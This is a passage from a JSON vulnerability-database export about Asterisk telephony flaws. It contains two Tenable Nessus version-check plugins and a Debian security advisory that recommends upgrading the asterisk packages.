- AST-2018-006)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-7284", "CVE-2018-7285", "CVE-2018-7287"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2018_001-006.NASL", "href": "https://www.tenable.com/plugins/nessus/107100", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107100);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2018-7284\",\n \"CVE-2018-7285\",\n \"CVE-2018-7286\",\n \"CVE-2018-7287\"\n );\n script_bugtraq_id(\n 103120,\n 103129,\n 103149,\n 103151\n );\n\n script_name(english:\"Asterisk 15.x < 15.2.2 Multiple Vulnerabilities (AST-2018-001 - AST-2018-006)\");\n script_summary(english:\"Checks the version in the SIP banner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its SIP banner, the version of Asterisk running on the\nremote host is 15.x prior to 15.2.2. It is therefore, affected by\nmultiple vulnerabilities as described in AST-2018-001, \nAST-2018-002, AST-2018-003, AST-2018-004, AST-2018-005,\n& AST-2018-006 advisories.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-001.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-003.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-005.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-006.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk version 15.2.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7285\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\nasterisk_kbs = get_kb_list_or_exit(\"sip/asterisk/*/version\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = pregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of installation on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing;\n # log error and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n if (version =~ \"^15([^0-9])\" && \"cert\" >!< tolower(version))\n {\n fixed = \"15.2.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_report_v4(severity:SECURITY_WARNING, port:port, proto:proto, extra:report);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installations : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln) exit(0);\n else audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk\", not_vuln_installs);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T01:48:57", "description": "Multiple vulnerabilities have been discovered in Asterisk, an open\nsource PBX and telephony toolkit, which may result in denial of\nservice or information disclosure.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2018-10-17T00:00:00", "title": "Debian DSA-4320-1 : asterisk - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-12227", "CVE-2018-7284", "CVE-2018-17281"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:asterisk", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4320.NASL", "href": "https://www.tenable.com/plugins/nessus/118158", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4320. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118158);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-12227\", \"CVE-2018-17281\", \"CVE-2018-7284\", \"CVE-2018-7286\");\n script_xref(name:\"DSA\", value:\"4320\");\n\n script_name(english:\"Debian DSA-4320-1 : asterisk - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in Asterisk, an open\nsource PBX and telephony toolkit, which may result in denial of\nservice or information disclosure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891227\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891228\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=902954\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=909554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4320\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the asterisk packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 1:13.14.1~dfsg-2+deb9u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"asterisk\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-config\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-dahdi\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-dev\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-doc\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-mobile\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-modules\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-mp3\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-mysql\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-ooh323\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-voicemail\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-voicemail-imapstorage\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-voicemail-odbcstorage\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-vpb\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T00:58:06", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7286", "CVE-2018-12227", "CVE-2018-7284", "CVE-2018-17281"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4320-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nOctober 16, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nCVE ID : CVE-2018-7284 CVE-2018-7286 CVE-2018-12227 CVE-2018-17281\nDebian Bug : 891227 891228 902954 909554\n\nMultiple vulnerabilities have been discovered in Asterisk, an open source\nPBX and telephony toolkit, which may result in denial of service or\ninformation disclosure.\n\t\t \nFor the stable distribution (stretch), these problems have been fixed in\nversion 1:13.14.1~dfsg-2+deb9u4.\n\nWe recommend that you upgrade your asterisk packages.\n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2018-10-16T21:54:44", "published": "2018-10-16T21:54:44", "id": "DEBIAN:DSA-4320-1:78762", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00251.html", "title": "[SECURITY] [DSA 4320-1] asterisk security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
